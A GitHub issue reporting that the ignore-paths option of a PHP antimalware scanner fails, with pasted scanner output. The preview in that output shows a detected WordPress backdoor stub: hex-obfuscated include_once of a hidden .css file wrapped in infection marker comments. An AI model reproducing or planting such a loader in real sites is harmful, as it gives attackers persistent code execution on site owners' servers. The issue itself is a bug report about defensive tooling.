Ignore-path has no effect #116

Open
kepon85 opened this issue Nov 14, 2024 · 0 comments
kepon85 commented Nov 14, 2024

Hello

Version 0.14.0

It seems to me that the ignore(s)-path has no effect. Here's why I say that:

I would have thought that the files in "ignore path" were ignored, but that doesn't seem to be the case. Of course I tried to put in unity, change the quotes, without wildcard...

root@srvweb:~# mkdir /tmp/dirtest
root@srvweb:~# cp /opt/scripttest/test.php /tmp/dirtest/test.php
root@srvweb:~# php /opt/PHP-Antimalware-Scanner/scanner -l --ignore-paths="/tmp/dirtesttest.php,test.php,*test.php,/*test.php" /tmp/dirtest/

         █████╗ ███╗   ███╗██╗    ██╗███████╗ ██████╗ █████╗ ███╗   ██╗         
        ██╔══██╗████╗ ████║██║    ██║██╔════╝██╔════╝██╔══██╗████╗  ██║         
        ███████║██╔████╔██║██║ █╗ ██║███████╗██║     ███████║██╔██╗ ██║         
        ██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║     ██╔══██║██║╚██╗██║         
        ██║  ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║  ██║██║ ╚████║         
        ╚═╝  ╚═╝╚═╝     ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝         
                                                                                
        Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner        

                                 version 0.14.0                                 

                                                                                
                            PHP Antimalware Scanner                             
                           Created by Marco Cesarato                            
                                                                                

Agile mode enabled
Start scanning...
Scan date: 2024-11-14 16:21:00
Scanning /tmp/dirtest

Mapping and retrieving checksums, please wait...


Verifying files checksum...

[===============================] 100%  1/1 [0 sec/0 sec]

Found 1 files to check

Checking files...

[>                              ] 0%  0/1 [0 sec/0 sec]


PROBABLE MALWARE FOUND!
/tmp/dirtest/test.php

=================================== PREVIEW ====================================

  1 | <?php
  2 | /*92e78*/
  3 | 
  4 | $rdpnv0 = "/var/www/chute/web/wp\x2dincludes/blocks/post\x2daut\x68or\x2dbiograp\x68y/.5397785d.css"; if (!isset($rdpnv0)) {strrev ($rdpnv0);} else { @include_once /* 185 */ ($rdpnv0); }
  5 | 
  6 | /*92e78*/

================================================================================

Checksum: 675edd52709681efd3936bfec5887fc7
File path: /tmp/dirtest/test.php

Evil code found: 
[!] Exploit (infected_comment) [line 2]
    - Comments composed by 5 random chars usually used to detect if a file is infected yet
      => /*92e78*/

OPTIONS:

    [1] Delete file
    [2] Move to quarantine
    [3] Dry run evil code fixer
    [4] Dry run evil line code fixer
    [5] Open with vim
    [6] Open with nano
    [7] Add to whitelist
    [8] Show source
    [-] Ignore


amwscan > What is your choice?  

Thanks,
David
